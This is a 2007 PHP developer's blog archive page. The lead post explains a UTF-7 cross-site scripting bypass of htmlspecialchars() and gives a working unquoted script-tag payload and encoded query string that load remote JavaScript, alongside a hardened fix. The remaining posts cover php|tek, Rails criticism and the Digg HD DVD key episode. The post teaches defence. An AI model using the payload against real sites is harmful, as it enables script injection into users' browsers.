About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for May 2007

Character Encoding and XSS

While lamenting Ronaldinho's red card and writing an overdue column for php|architect this weekend, I took a break to read Kevin Yank's latest post, Good and Bad PHP Code.

In the post, he provides a few useful PHP interview questions, including some questions from Yahoo as well as his personal favorite:

In your mind, what are the differences between good PHP code and bad PHP code?

He explains that good PHP code should be:

  • Structured
  • Consistent
  • Portable
  • Secure

He also takes an example of bad PHP code and makes it better, producing this:

<?php

if (isset($_GET['query'])) {
    echo '<p>Search results for query: ',
         htmlspecialchars($_GET['query'], ENT_QUOTES),
         '.</p>';
}

?>

In the comments, many additional improvements have been suggested, but there's one that has yet to be mentioned. When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible. If you've been reading my blog for a while, you can probably put the pieces together yourself, so feel free to give it a go. The only obstacle is the fact that ENT_QUOTES causes all quotes to be escaped, and quotes are consistent between UTF-7 and ISO-8859-1, so you need an example exploit that doesn't use them:

<script src=http://shiflett.org/xss.js>

Web standards pedants might cringe, but this works in most browsers, despite the missing quotes, and the JavaScript returned by xss.js executes within the context of the current page.

To try this out, just save the example PHP code somewhere, then visit it with your browser, including the following value in the query string:

?query=%2BADw-script+src%2BAD0-http%3A%2F%2Fshiflett.org%2Fxss.js%2BAD4-

This only works in browsers that automatically detect the character encoding, but you can mimic the situation by manually setting your browser to use UTF-7 or by sending a Content-Type header that does the same thing:

<?php

header('Content-Type: text/html; charset=UTF-7');

?>
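As an added example (not code from the post or from Kevin Yank's article), here is the search snippet with the encoding pinned so the browser has nothing to detect. It reuses the post's query-string value, URL-decoded, as its input; the function names and the CLI branch are choices made here, and it assumes PHP 5.4 or later for ENT_SUBSTITUTE and the mbstring extension for the decoding check.

```php
<?php
// Added example (not from the post or Kevin Yank's article): the post's search
// snippet, hardened so a browser cannot guess the response's encoding.

// The query-string value the post gives, URL-decoded, reused here as input.
$query = '+ADw-script src+AD0-http://shiflett.org/xss.js+AD4-';

// Escaping alone cannot catch it: as bytes, the value holds no '<', '>' or
// quotes, so htmlspecialchars() returns it unchanged whether or not a charset
// is passed (the default was ISO-8859-1 in the PHP of 2007, UTF-8 since 5.4).
function escape_without_charset(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES);
}

function escape_utf8(string $s): string
{
    // ENT_SUBSTITUTE turns invalid UTF-8 byte sequences into U+FFFD instead of
    // making htmlspecialchars() return '' and silently blanking the output.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The fix: declare the encoding before any output, and use the same charset in
// htmlspecialchars(), so the browser never falls back to detection.
function render_results(string $query): void
{
    header('Content-Type: text/html; charset=UTF-8');
    echo '<!DOCTYPE html><html><head>',
         '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">',
         '</head><body>';
    echo '<p>Search results for query: ', escape_utf8($query), '.</p>';
    echo '</body></html>';
}

if (PHP_SAPI === 'cli') {
    // Demonstration run from the command line (no headers involved).
    var_dump(escape_without_charset($query) === $query); // bool(true)
    var_dump(escape_utf8($query) === $query);            // bool(true)

    // What a browser that sniffs the response as UTF-7 makes of that
    // "escaped" text: the unquoted script tag from the post.
    echo mb_convert_encoding(escape_utf8($query), 'UTF-8', 'UTF-7'), "\n";
} elseif (isset($_GET['query'])) {
    render_results($_GET['query']);
}
```

Run from the CLI it shows that neither escaping call alters the payload; served over HTTP, the pinned charset is what stops the UTF-7 interpretation.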

Terry Chay on Rails

Terry Chay's latest post is a work of art. This is why I read his blog. (If you're easily offended, you shouldn't.) He gives a quick slap in the face to those with more ego than intelligence (an issue highlighted by Jeremy Privett), then launches into a sarcastic, fact-filled tirade that cuts through some of the Rails hype:

Maybe if we work really hard at promoting ourselves, we can get a developer to create a site using PHP that will reach #700 on the Internet and fails so often that they've ruined the cuteness of cats.

To back up some of his commentary, he presents two graphs:

The first graph is used to put Twitter's success into perspective. Terry works at Tagged, so he uses that as an example PHP site and adds Facebook, because it's the heavyweight of that genre.

The second graph is a subtle reference to the reaction to Twitter's honest criticism of Rails. Terry asks:

Remind me, what is DHH doing lecturing Alex about scalability?

It's a rhetorical question, of course, because his graph clearly shows that Alex's web site receives far more traffic than anything ever developed by 37 Signals.

Terry makes another good point with this list:

  1. People like me are smart and have to run extremely large, scalable Internet infrastructures.
  2. People like me have used Rails.
  3. People like me don't use Rails to build extremely large, scalable Internet infrastructures.

I can think of several people who fit this description. In fact, I work for a technology-agnostic company that works on some of the largest web sites on the Internet. We have experience developing with Rails, and we have experience migrating from Rails to PHP. :-)

I'm sure Terry's post will be interpreted by many to be a criticism of Rails, but if anything, I think it's a criticism of the Rails community, similar to my post from early last year. Over time, Rails will certainly mature, but those of us who are interested in the technology (not the hype) would prefer to see the veil of perfection dropped in favor of progress. Terry hopes to see a new perspective adopted by the Rails community:

Maybe those people who build really large web sites daily have something to teach us.

Maybe they do.

Back from php|tek

php|tek was another well-organized event from the folks at php|architect. Just like my previous experience traveling to a conference, I arrived at JFK to discover that my flight had been cancelled. (This is becoming an unwelcome tradition.) A few more cancellations and delays later, and I was on my way to Chicago, albeit several hours late. Finding a place to stay turned out to be another fiasco, because I had a Seinfeld experience with my hotel reservation:

Jerry: I don't understand. I made a reservation. Do you have my reservation?

Agent: Yes, we do. Unfortunately, we ran out of cars.

Jerry: But the reservation keeps the car here. That's why you have the reservation.

Agent: I know why we have reservations.

Jerry: I don't think you do. If you did, I'd have a car. See, you know how to take the reservation, you just don't know how to hold the reservation. And that's really the most important part of the reservation, the holding.

In summary, traveling is a pain in the ass. Let's talk about the conference!

My hands-on talk was quite a challenge, because I was still sick (and thus had a difficult time speaking), and because there was no network availability in the room where I was presenting. I typically never rely on the network, but this talk was designed to let people exploit various security vulnerabilities. Luckily, a few people were able to follow along on their laptops, but given the circumstances, I should have given a different talk. I did receive some positive feedback, but I think people were just being nice. :-)

My other talk, The Truth about Sessions, was much better, and there was some good discussion at the end about various trending techniques. I put Nate on the spot (and on the hook) when I mentioned a CakePHP feature / component for trending. As an aside, if you live near Maryland or can afford to make the trip, Nate is giving a talk on Mon, 04 Jun 2007 at the June PHP Meetup at OmniTI:

CakePHP core developer Nate Abele will be presenting a case study on developing a component to enhance session security in your applications. This case study will touch on both how to secure your CakePHP applications, as well as reusable component design, and how to structure your code according to the CakePHP philosophy.

I had some parsekit questions I wanted to ask Sara while at the conference, but unfortunately, I never got the chance. In fact, I excused myself from most social activities, because I was trying to get well. As a result, I didn't get to spend much time chatting with friends. I did manage to participate in the podcast while I was there, and I'm surprised Sean managed to salvage so much content from that evening. :-) I also got to meet some people I've known for a while but have never met in person, such as Jeff Moore, Richard Lynch, and Caroline Maynard.

It was nice to see the ladies of PHPWomen.org wearing their stylish shirts. They were very well represented.

Although I didn't get to see it myself, I was happy to hear that Rasmus's talk included some of Jeremiah's research on JavaScript malware. There's no better security advocate in the PHP community than Rasmus. :-)

If you're looking for slides, Chris Cornutt of PHPDeveloper.org has been doing a great job collecting talks on his talks page.

In Chicago for php|tek

After a very long and eventful day filled with multiple cancellations, delays, and overbooked hotels, I'm finally in Chicago (well, Schaumburg) and ready for php|tek. I'm fighting a cold (and currently losing; the travel problems haven't helped), so I might be incognito Wednesday morning while I try to recover. I should be around before my talk at the end of the day Wednesday, and of course I'll be around for the remainder of the conference after that. If you're going to be here, please stop by and introduce yourself.

I'm giving two talks, and the one I'm most excited about is The Truth about Sessions. This talk is similar to one I gave a few years ago in Toronto, but this time it's better. :-) The talk focuses on teaching you exactly how sessions work, beginning with the very basics (HTTP, statelessness, etc.). I spend a bit of time talking about session security at the end, but if I do my job, you'll understand sessions well enough by that point to devise solutions to basic security problems yourself. It's definitely a teach a man to fish talk.

My other talk is called PHP Security by Example, and it's more hands-on. The time slot of one hour isn't enough to let you work through each of the exercises independently, but I have tried to structure the talk to make it easy to follow along, so bring your laptop.

By the way, if you're wondering why Sean is so excited about Andy McKee, check out the highest rated videos on YouTube. (He currently holds 3 of the top 6 slots.) His mastery of the guitar reminds me of Kaki King, and I'm sure it will be really cool to watch him play Thursday night.

Learning from Digg (DeCSS 2.0)

As I write this, Digg is offline after being overrun with stories about the HD DVD key that was recently leaked.

Why are such stories so popular? Primarily because the original story about the leak was removed, which itself was a reaction to recent threats by AACS LA, and these events have garnered widespread attention. Jay Adelson briefly explains the situation and asks for some cooperation:

We all need to work together to protect Digg from exposure to lawsuits that could very quickly shut us down.

Slashdot's story is unlikely to suffer the same fate, so many Digg users are questioning Digg's stance on this issue. To be fair, this has very little to do with Digg specifically, and I wish them the best of luck addressing the current situation.

The real issue is that the traditional notion of damage control doesn't really work in a world where information spreads so quickly. I have previously expressed concerns about mob mentality, and this situation is another lesson. Prior to the recent threats, most people didn't care whether they could write their own software to watch movies. (The key was leaked months ago.) This wasn't big news.

Now it's everywhere.

Is it just me, or is this DeCSS 2.0?